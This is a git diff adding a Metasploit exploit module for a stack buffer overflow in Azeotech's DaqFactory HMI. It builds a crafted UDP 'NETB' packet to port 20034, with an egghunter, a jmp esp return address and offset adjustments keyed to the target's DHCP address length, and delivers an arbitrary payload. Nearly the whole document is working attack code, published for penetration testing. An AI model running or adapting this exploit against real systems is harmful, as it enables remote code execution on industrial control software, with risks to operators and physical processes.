diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb new file mode 100644 index 0000000000..546bf6257f --- /dev/null +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -0,0 +1,148 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::Egghunter + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DaqFactory HMI NETB Request Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Azeotech's DaqFactory + product. The specfic vulnerability is triggered when sending a specially crafted + 'NETB' request to port 20034. Exploitation of this vulnerability may take a few + seconds due to the use of egghunter. This vulnerability was one of the 14 + releases discovered by researcher Luigi Auriemma. + }, + 'Author' => + [ + 'Luigi Auriemma', # Initial discovery, crash poc + 'mr_me ', # msf exploit + ], + + 'Version' => '$Revision$', + 'References' => + [ + ['URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'InitialAutoRunScript' => 'migrate -f', + }, + 'Payload' => + { + 'Space' => 600, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3', + { + 'Ret' => 0x100B9EDF, # jmp esp PEGRP32A.dll + 'Offset' => 636, + } + ], + ], + 'DisclosureDate' => 'Sep 13 2011', + 'DefaultTarget' => 0)) + + register_options( + [ + # Required for EIP offset + OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]), + Opt::RPORT(20034) + ], self.class) + end + + def exploit + connect_udp + + print_status("Trying target #{target.name}...") + + eggoptions ={ + :checksum => false, + :eggtag => 'scar', + } + + # Correct the offset according to the 2nd IP (DHCP) length + iplen = datastore['DHCP'].length + + if iplen == 15 + offset = 78 + elsif iplen == 14 + offset = 79 + elsif iplen == 13 + offset = 80 + elsif iplen == 12 + offset = 81 + elsif iplen == 11 + offset = 82 + elsif iplen == 10 + offset = 83 + elsif iplen == 9 + offset = 84 + elsif iplen == 8 + offset = 85 + elsif iplen == 7 + offset = 86 + elsif iplen == 6 + offset = 87 + # attack class A ip, slightly unlikly, but just in case. + elsif iplen == 5 + offset = 88 + end + + if offset >= 80 + pktoffset = offset - 80 + finaloffset = target['Offset']-pktoffset + elsif offset <= 79 + pktoffset = 80 - offset + finaloffset = target['Offset']+pktoffset + end + + # springboard onto our unmodified payload + p = Rex::Arch::X86.jmp(750) + payload.encoded + hunter,egg = generate_egghunter(p, payload_badchars, eggoptions) + + sploit = "NETB" # NETB request overflow + sploit << rand_text_alpha_upper(233) + sploit << "\x00" # part of the packet structure + sploit << rand_text_alpha_upper(offset) # include the offset for the DHCP address + sploit << make_nops(2) + sploit << hunter + sploit << rand_text_alpha_upper(52-hunter.length-2) + sploit << [target.ret].pack("V") + sploit << rand_text_alpha_upper(12) + sploit << Rex::Arch::X86.jmp_short(-70) + sploit << egg + # packetlen needs to be adjusted to a max of 0x400 as per advisory + sploit << rand_text_alpha_upper(finaloffset-egg.length) + + # The use of rand_text_alpha_upper() ensures we always get the same length for the + # first IP address. See the following for more details: + # http://dev.metasploit.com/redmine/issues/5453 + sploit[12,4] = rand_text_alpha_upper(4) + + udp_sock.put(sploit) + + handler + disconnect_udp + end + +end